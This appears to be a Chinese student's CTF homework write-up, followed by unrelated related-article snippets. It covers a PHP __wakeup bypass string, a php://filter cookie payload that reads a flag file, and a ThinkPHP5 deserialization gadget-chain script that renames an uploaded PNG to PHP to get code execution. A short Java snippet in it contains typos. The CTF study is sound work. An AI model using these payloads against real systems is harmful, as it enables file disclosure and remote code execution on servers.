1.21作业
1
unserialize3
当序列化字符串中属性个数大于实际属性个数时,不会执行反序列化
外部如果是unserialize()会调用wakeup()方法,输出“bad request”——构造url绕过wakeup
类型:public class,直接构造:
O:4:"xctf":1:{s:4:"flag";s:3:"111";} 改为:O:4:"xctf":2:{s:4:"flag";s:3:"111";}2
“找出攻击者的IP”
http协议中,
可疑:POST了hacker.php,追踪hacker.php,url解码,确认是开了个后门
3
进入
就是base64解码
4
只出现一次的数字
class Solution{public int singleNumber(int[t] nums){int result = 0;for (int num : nums)}{result =resut ^num;}return result;}
}5
fileinclude
PHP: php:// - Manual
Cookie: language=php://filter/read=convert.base64-encode/resource=/var/www/html/flag
upload3
注册登录,对头像尝试文件上传,但无法执行
进行目录扫描获取源码,TP5框架
profile.php
cookie有个反序列化,审完代码以后可以i使用(覆盖掉filename)
if:前两个判断不用改就可以绕过,进ext_check()判断
然后赋值ext
接下来把 filename_tmp 移动到 filename时,就可以把 png 移动为 php 文件了。
_get()与_call():作用上传图像访问,被访问不存在时调用 upload_img()
register.php:
registed 赋值为 false,checker 赋值为我们的 $profile
从而调用其中的 index 方法,再跳到 upload_img() 了。
<?phpnamespace app\web\controller;
error_reporting(0);
class Profile
{public $checker;public $filename_tmp;public $filename;public $upload_menu;public $ext;public $img;public $except;public function __get($name){return $this->except[$name];}public function __call($name, $arguments){if($this->{$name}){$this->{$this->{$name}}($arguments);}}}class Register
{public $checker;public $registed;public function __destruct(){if(!$this->registed){$this->checker->index();}}}$profile = new Profile();
$profile->except = ['index' => 'img'];
$profile->img = "upload_img";
$profile->ext = "png";
$profile->filename_tmp = "./upload/e0080b11355313cb26095733241d9209/0412c29576c708cf0155e8de242169b1.png";
$profile->filename = "./upload/e0080b11355313cb26095733241d9209/0412c29576c708cf0155e8de242169b1.php";$register = new Register();
$register->registed = false;
$register->checker = $profile;echo urlencode(base64_encode(serialize($register)));ThinkPHP5.1反序列化漏洞利用-CSDN博客
相关文章:
1.21作业
1 unserialize3 当序列化字符串中属性个数大于实际属性个数时,不会执行反序列化 外部如果是unserialize()会调用wakeup()方法,输出“bad request”——构造url绕过wakeup 类型:public class&…...
深度集成DeepSeek大模型:WebSocket流式聊天实现
目录 5分钟快速接入DeepSeek大模型:WebSocket实时聊天指南创建应用开发后端代码 (Python/Node.js)结语 5分钟快速接入DeepSeek大模型:WebSocket实时聊天指南 创建应用 访问DeepSeek官网 前往 DeepSeek官网。如果还没有账号,需要先注册一个。…...
Jmeter连接数据库、逻辑控制器、定时器
Jmeter直连数据库 直接数据库的使用场景 直连数据库的关键配置 添加MYSQL驱动Jar包 方式一:在测试计划面板点击“浏览”按钮,将你的JDBC驱动添加进来 方式二:将MySQL驱动jar包放入到lib/ext目录下,重启JMeter 配置数据库连接信…...
『Linux笔记』进程间通信(IPC)详细介绍!
进程间通信(IPC)详细介绍! 文章目录 一. 进程间通信(IPC)详细介绍1. 共享内存(Shared Memory)2. 消息队列(Message Queues)3. 信号量(Semaphores)…...
Jmeter进阶篇(34)如何解决jmeter.save.saveservice.timestamp_format=ms报错?
问题描述 今天使用Jmeter完成压测执行,然后使用命令将jtl文件转换成html报告时,遇到了报错! 大致就是说jmeter里定义了一个jmeter.save.saveservice.timestamp_format=ms的时间格式,但是jtl文件中的时间格式不是标准的这个ms格式,导致无法正常解析。对于这个问题,有如下…...
Visual Studio 2022配置网址参考
代码格式化和清理冗余代码选项的配置: 代码样式选项和代码清理 - Visual Studio (Windows) | Microsoft Learn 调试时传递参数: 调试时传递命令行参数(C) - Visual Studio (Windows) | Microsoft Learn...
常见命令详解)
Redis中集合(Set)常见命令详解
集合(Set)常见命令详解 集合(Set)在Redis中是一种无序且不可重复的数据结构,非常适合用于存储唯一元素的集合。以下是Redis集合操作的一些常用命令及其详细说明: 添加成员 sadd key member [member ...]…...
动态规划
简介 动态规划最核心两步: 状态表示:dp[i]代表什么状态转移方程:如何利用已有的dp求解dp[i] 只要这两步搞对了, 就完成了动态规划的%95 剩下的就是细节问题: dp初始化顺序(有时是倒序)处理边…...
stm32rtc实时时钟详解文章
目录 stm32 后备区域基础知识详解 stm32 bkp基础知识详解 Unix时间戳基础知识详解 stm32 rtc实时时钟基础知识详解 相关代码初始化配置 欢迎指正,希望对你,有所帮助!!! stm32 后备区域基础知识详解 stm32芯片的 …...
DeepSeek 助力 Vue 开发:打造丝滑的 键盘快捷键(Keyboard Shortcuts)
前言:哈喽,大家好,今天给大家分享一篇文章!并提供具体代码帮助大家深入理解,彻底掌握!创作不易,如果能帮助到大家或者给大家一些灵感和启发,欢迎收藏关注哦 💕 目录 Deep…...
【第一节】C++设计模式(创建型模式)-工厂模式
目录 前言 一、面向对象的两类对象创建问题 二、解决问题 三、工厂模式代码示例 四、工厂模式的核心功能 五、工厂模式的应用场景 六、工厂模式的实现与结构 七、工厂模式的优缺点 八、工厂模式的扩展与优化 九、总结 前言 在面向对象系统设计中,开发者常…...
深入理解 SQL 注入漏洞及解决方案
一、引言 在当今数字化时代,数据库作为存储和管理数据的核心组件,其安全性至关重要。SQL 注入是一种常见且极具威胁性的数据库安全漏洞,它可能导致数据泄露、篡改甚至系统被完全控制。本文将深入探讨 SQL 注入漏洞的产生原因、表现形式以及如…...
使用 deepseek实现 go语言,读取文本文件的功能,要求支持 ascii,utf-8 等多种格式自适应
使用 deepseek实现 go语言,读取文本文件的功能,要求支持 ascii,utf-8 等多种格式自适应我要用 chatgpt,也问过,但是比 deepseek 还是差一个级别,具体如下: package mainimport ("bufio&qu…...
7.【线性代数】——求解Ax=0,主列和自由列
七 求解Ax0,主列和自由列 1. 消元、秩、特解特解零空间 2. 简化行阶梯形式 :主元上下都是0,主元简化为1 1. 消元、秩、特解 矩阵消元 [ 1 2 2 2 2 4 6 8 3 6 8 10 ] ⏟ A ⇒ r o w 2 − 2 r o w 1 , r o w 3 − 3 r o w 1 [ 1 2 2 2 0 0 2 4 0 0 2 4 ]…...
vue3结合后端传递过来的文件进行预览功能
业务的需要,前端需要根据后端传递过来的文件流进行预览的功能,前端点击链接直接触发浏览器的窗口的预览功能。 实现方式一: 使用弹窗和iframe的标签的形式进行预览文件,但是iframe可能会出现网站安全性的问题,限制比较…...
】掌控全局:分布式爬虫的任务管理与监控之道)
【Python爬虫(39)】掌控全局:分布式爬虫的任务管理与监控之道
【Python爬虫】专栏简介:本专栏是 Python 爬虫领域的集大成之作,共 100 章节。从 Python 基础语法、爬虫入门知识讲起,深入探讨反爬虫、多线程、分布式等进阶技术。以大量实例为支撑,覆盖网页、图片、音频等各类数据爬取ÿ…...
Jenkins整合Jmeter实现接口自动化测试
🍅 点击文末小卡片,免费获取软件测试全套资料,资料在手,涨薪更快 一、安装jmeter 下载:http://jmeter.apache.org/download_jmeter.cgi 这里我用了一台Windows安装jmeter用来写接口测试的脚本,启动前修改j…...
使用详解)
Web 自动化测试提速利器:Aqua 的 Web Inspector (检查器)使用详解
Web 自动化测试提速利器:Aqua 的 Web Inspector (检查器)使用详解 前言简介一、安装二、Web Inspector 的使用2.1 获取元素定位器(Locators)2.2 将定位器添加到代码2.3 验证定位器2.4 处理 Frames (框架)总结前言 JetBrains 的 Aqua IDE 提供强大的 Web Inspector 工具,帮…...
大语言模型:从开发到运行的深度解构
一、LLM开发训练的全流程解析 1. 数据工程的炼金术 数据采集:构建涵盖网页文本(Common Crawl)、书籍、论文、代码等领域的超大规模语料库,典型规模可达数十TB。例如GPT-4的训练数据包含超过13万亿token数据清洗:通过…...
【GoLang】【算法模板】2、GoLang 算法模板整理
文章目录 0、前言1、GoLang 算法必会技巧1.1、标准库1.1.1、sort 包1.1.2、slice 包 1.2、数据结构1.2.1、优先队列 2、板子2.1、二分2.1.1、lower_bound、upper_bound 2.2、字符串2.2.1、kmp 0、前言 整理一下 golang 的算法板子,作为备忘录使用。可能有些板子、博…...
FPGA纯Verilog实现10G UDP协议栈:从XGMII接口到AXI4-Stream的数据通路设计与验证
1. 10G UDP协议栈的设计挑战与解决方案 在FPGA上实现10G以太网UDP协议栈是一项极具挑战性的任务,特别是在需要纯Verilog实现的情况下。我曾经在一个数据中心加速卡项目中就遇到过这样的需求,当时为了满足低延迟和高吞吐量的要求,不得不从最底…...
OmenSuperHub:3分钟解锁惠普游戏本终极性能控制指南
OmenSuperHub:3分钟解锁惠普游戏本终极性能控制指南 【免费下载链接】OmenSuperHub 使用 WMI BIOS控制性能和风扇速度,自动解除DB功耗限制。 项目地址: https://gitcode.com/gh_mirrors/om/OmenSuperHub 你是否厌倦了官方Omen Gaming Hub的臃肿、…...
SureSim框架:机器人策略评估的高效仿真方法
1. SureSim框架:机器人策略评估的革新方法在机器人学习领域,策略评估一直是个令人头疼的问题。想象一下,你训练了一个能抓取各种物体的机械臂策略,现在需要评估它在不同物体、不同摆放位置下的表现。传统做法是让机械臂在真实世界…...
从Postman实战到源码:拆解SpringBoot处理multipart/form-data和application/x-www-form-urlencoded的全过程
从Postman实战到源码:拆解SpringBoot处理multipart/form-data和application/x-www-form-urlencoded的全过程 在Web开发中,理解HTTP请求的数据传输格式对于构建高效、可靠的应用程序至关重要。本文将深入探讨SpringBoot如何处理两种常见的HTTP请求体格式&…...
使用零刻mini主机/群晖/Macmini 用docker部署OpenClaw喂饭级踩坑详细教程|以及多用户多Agent对接
群晖的部署遇到挺多问题的整理下给大家一个喂饭部署教程以及一些遇到的问题总结,都是这段时间一点一点部署修改得出来的一些经验,目前整理了群晖和Mac部署的,以后有零刻再更新做零刻的部署方法 黑群晖/群晖部署 先下载文件 拉取文件 先进入s…...
如何集成Hermes Agent/OpenClaw?2026年阿里云及Coding Plan配置保姆级攻略
如何集成Hermes Agent/OpenClaw?2026年阿里云及Coding Plan配置保姆级攻略。OpenClaw(前身为Clawdbot/Moltbot)作为开源、本地优先的AI助理框架,凭借724小时在线响应、多任务自动化执行、跨平台协同等核心能力,成为个人…...
FF14钓鱼神器:渔人的直感 - 智能计时器让你的钓鱼效率提升300%
FF14钓鱼神器:渔人的直感 - 智能计时器让你的钓鱼效率提升300% 【免费下载链接】Fishers-Intuition 渔人的直感,最终幻想14钓鱼计时器 项目地址: https://gitcode.com/gh_mirrors/fi/Fishers-Intuition 还在为错过幻海流的最佳时机而懊恼吗&#…...
)
SpringBoot + JAIN-SIP 实战:手把手教你搭建国标GB28181摄像头管理后台(附完整代码)
SpringBoot与JAIN-SIP构建国标GB28181平台实战指南 1. 国标视频监控平台的技术架构解析 GB28181标准作为国内视频监控领域的核心协议,定义了设备互联的完整规范体系。这套标准主要包含三个关键组成部分: SIP信令控制层:负责设备注册、会话…...
高精度霍尔电流传感器在高压功率系统中的应用
摘要随着新能源汽车、光伏逆变器、储能系统以及工业自动化的发展,功率电子系统正向更高功率密度和更高效率方向发展。在这些系统中,电流检测不仅用于系统控制,还承担着保护、监测和能量管理等重要功能。传统电流检测方案在高压应用中通常需要…...
从Edge WL到Page差异:深入NAND Flash内部,拆解Read Disturb的‘攻击路径’
从Edge WL到Page差异:深入NAND Flash内部,拆解Read Disturb的‘攻击路径’ 想象一下,当你从SSD读取一个文件时,存储芯片内部正上演着一场微观世界的"多米诺骨牌效应"——每次读操作都可能引发相邻存储单元的连锁反应。这…...